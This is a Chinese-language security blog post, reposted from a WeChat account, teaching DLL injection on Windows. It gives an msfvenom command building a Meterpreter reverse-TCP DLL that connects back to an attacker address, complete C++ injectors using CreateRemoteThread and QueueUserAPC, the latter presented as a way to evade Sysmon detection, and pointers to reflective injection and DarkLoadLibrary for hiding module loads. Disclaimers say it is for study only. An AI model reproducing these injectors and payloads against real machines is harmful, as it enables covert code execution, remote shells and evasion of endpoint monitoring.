DLL injection

admin 2021年10月6日09:48:12评论121 views字数 4411阅读14分42秒阅读模式

什么是dll注入


在Windows操作系统中,运行的每一个进程都生活在自己的程序空间中(保护模式),每一个进程都认为自己拥有整个机器的控制权,每个进程都认为自己拥有计算机的整个内存空间,这些假象都是操作系统创造的(操作系统控制CPU使得CPU启用保护模式)。理论上而言,运行在操作系统上的每一个进程之间都是互不干扰的,即每个进程都会拥有独立的地址空间。比如说进程B修改了地址为0x4000000的数据,那么进程C的地址为0x4000000处的数据并未随着B的修改而发生改变,并且进程C可能并不拥有地址为0x4000000的内存(操作系统可能没有为进程C映射这块内存)。因此,如果某进程有一个缺陷覆盖了随机地址处的内存(这可能导致程序运行出现问题),那么这个缺陷并不会影响到其他进程所使用的内存。

  也正是由于进程的地址空间是独立的(保护模式),因此我们很难编写能够与其它进程通信或控制其它进程的应用程序。

  所谓的dll注入即是让程序A强行加载程序B给定的a.dll,并执行程序B给定的a.dll里面的代码。注意,程序B所给定的a.dll原先并不会被程序A主动加载,但是当程序B通过某种手段让程序A“加载”a.dll后,程序A将会执行a.dll里的代码,此时,a.dll就进入了程序A的地址空间,而a.dll模块的程序逻辑由程序B的开发者设计,因此程序B的开发者可以对程序A为所欲为。因为执行命令需要借用某些合法进程,所以一般的进程注入都要绕过AV检测。


dll注入实现过程


DLL injection


       1.附加到目标/远程进程

       2.在目标/远程进程内分配内存

       3.将DLL文件路径,或者DLL文件,复制到目标/远程进程的内存空间

       4.控制进程运行DLL文件


主要用到的几个函数:


OpenProcess、VirtualAllocEx、WriteProcessMemory、CreateRemoteThread


既然是dll注入,那么我们肯定需要一个dll,我们使用msf直接生成一个dll出来:


msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=4444 -f dll -o inject.dll


然后手写一个dll注入器:


#include<Windows.h>#include<stdio.h>
using namespace std;
int main(int argc,char * argv[]) { HANDLE ProcessHandle; LPVOID remotebuffer; BOOL write;
wchar_t dllpath[] = TEXT("C:\users\root\desktop\inject.dll");
if (argc < 2) { printf("Useage inject.exe Pid;n"); printf("such as inject.exe 258n"); exit(0); }
printf("Injecting DLL to PID: %in", atoi(argv[1])); ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1]))); if (ProcessHandle == NULL) { printf("OpenProcess Fail !!!"); exit(0); } else { printf("OpenProcess %i successful !!!n",atoi(argv[1])); }
remotebuffer = VirtualAllocEx(ProcessHandle, NULL, sizeof dllpath, MEM_COMMIT, PAGE_READWRITE); write = WriteProcessMemory(ProcessHandle, remotebuffer, (LPVOID)dllpath, sizeof dllpath, NULL); if (write == 0) { printf("WriteProcessMemory Fail %i!!!",GetLastError()); exit(0); } else { printf("WriteProcessMemory successful !!!n"); }
PTHREAD_START_ROUTINE threatStartRoutineAddress = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW"); CreateRemoteThread(ProcessHandle, NULL, 0, threatStartRoutineAddress, remotebuffer, 0, NULL); CloseHandle(ProcessHandle);

return 0;}


在进程监控中,也可以清楚的看到进程被注入了dll。


DLL injection


在上面的注入方式中,我们使用了CreateRemoteThread来进行dll注入,而这个方式在具有Sysmon的系统中会留下Event ID 8的痕迹。而我们使用通过APC实现Dll注入则可以绕过这种监控。


#include <windows.h>#include <TlHelp32.h>#include <vector>
using std::vector;
bool FindProcess(PCWSTR exeName, DWORD& pid, vector<DWORD>& tids) { auto hSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS | TH32CS_SNAPTHREAD, 0); if (hSnapshot == INVALID_HANDLE_VALUE) return false; pid = 0; PROCESSENTRY32 pe = { sizeof(pe) }; if (::Process32First(hSnapshot, &pe)) { do { if (_wcsicmp(pe.szExeFile, exeName) == 0) { pid = pe.th32ProcessID; THREADENTRY32 te = { sizeof(te) }; if (::Thread32First(hSnapshot, &te)) { do { if (te.th32OwnerProcessID == pid) { tids.push_back(te.th32ThreadID); } } while (::Thread32Next(hSnapshot, &te)); } break; } } while (::Process32Next(hSnapshot, &pe)); } ::CloseHandle(hSnapshot); return pid > 0 && !tids.empty();}
void main(){ DWORD pid; vector<DWORD> tids; if (FindProcess(L"calc.exe", pid, tids)) { printf("OpenProcessn"); HANDLE hProcess = ::OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, pid); printf("VirtualAllocExn"); auto p = ::VirtualAllocEx(hProcess, nullptr, 1 << 12, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); wchar_t buffer[] = L"c:\test\testdll.dll"; printf("WriteProcessMemoryn"); ::WriteProcessMemory(hProcess, p, buffer, sizeof(buffer), nullptr); for (const auto& tid : tids) { printf("OpenThreadn"); HANDLE hThread = ::OpenThread(THREAD_SET_CONTEXT, FALSE, tid); if (hThread) { printf("GetProcAddressn"); ::QueueUserAPC((PAPCFUNC)::GetProcAddress(GetModuleHandle(L"kernel32"), "LoadLibraryW"), hThread, (ULONG_PTR)p); } } printf("VirtualFreeExn"); ::VirtualFreeEx(hProcess, p, 0, MEM_RELEASE | MEM_DECOMMIT); }}


反射型dll注入


反射DLL注入可以将加密的DLL保存在磁盘(或者以其他形式如shellcode等),之后将其解密放在内存中。之后跟DLL注入一般,使用VirtualAlloc和WriteProcessMemory将DLL写入目标进程。因为没有使用LoadLibrary函数,要想实现DLL的加载运行,我们需要在DLL中添加一个导出函数,ReflectiveLoader,这个函数实现的功能就是加载自身。


反射DLL注入实现起来其实十分复杂,需要对PE加载十分了解。通过编写ReflectiveLoader找到DLL文件在内存中的地址,分配装载DLL的空间,并计算 DLL 中用于执行反射加载的导出的内存偏移量,然后通过偏移地址作为入口调用 CreateRemoteThread函数执行。


msf已经有了相应的模块:


windows/manage/reflective_dll_inject


在内存中,可以看到明显的PE标识:


DLL injection


将其dump后


DLL injection


放入PE查看工具,可看到其为正常的PE文件与RDI特有的名字:


DLL injection


此类文件可配合sRdi使用,效果更佳。


DarkLoadLibrary


DarkLoadLibrary由batsec提出的项目,文章地址:

https://www.mdsec.co.uk/2021/06/bypassing-image-load-kernel-callbacks/


项目地址:https://github.com/bats3c/DarkLoadLibrary


图标展示了其特点:


DLL injection


其支持磁盘加载、内存加载。


磁盘加载:


DLL injection


内存加载:


DLL injection


其DarkLoadLibraryDebugging为自定义的名称,与NO_LINK,则看不到明显的dll加载痕迹


DLL injection


缺点是仅支持当前进程不支持远程进程,但不得不说,其优越性的确可以是当前进程加载dll的不二之选。


     ▼
更多精彩推荐,请关注我们


请严格遵守网络安全法相关条例!此分享主要用于学习,切勿走上违法犯罪的不归路,一切后果自付!


DLL injection




原文始发于微信公众号(鸿鹄实验室):DLL injection

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年10月6日09:48:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DLL injectionhttps://cn-sec.com/archives/566730.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息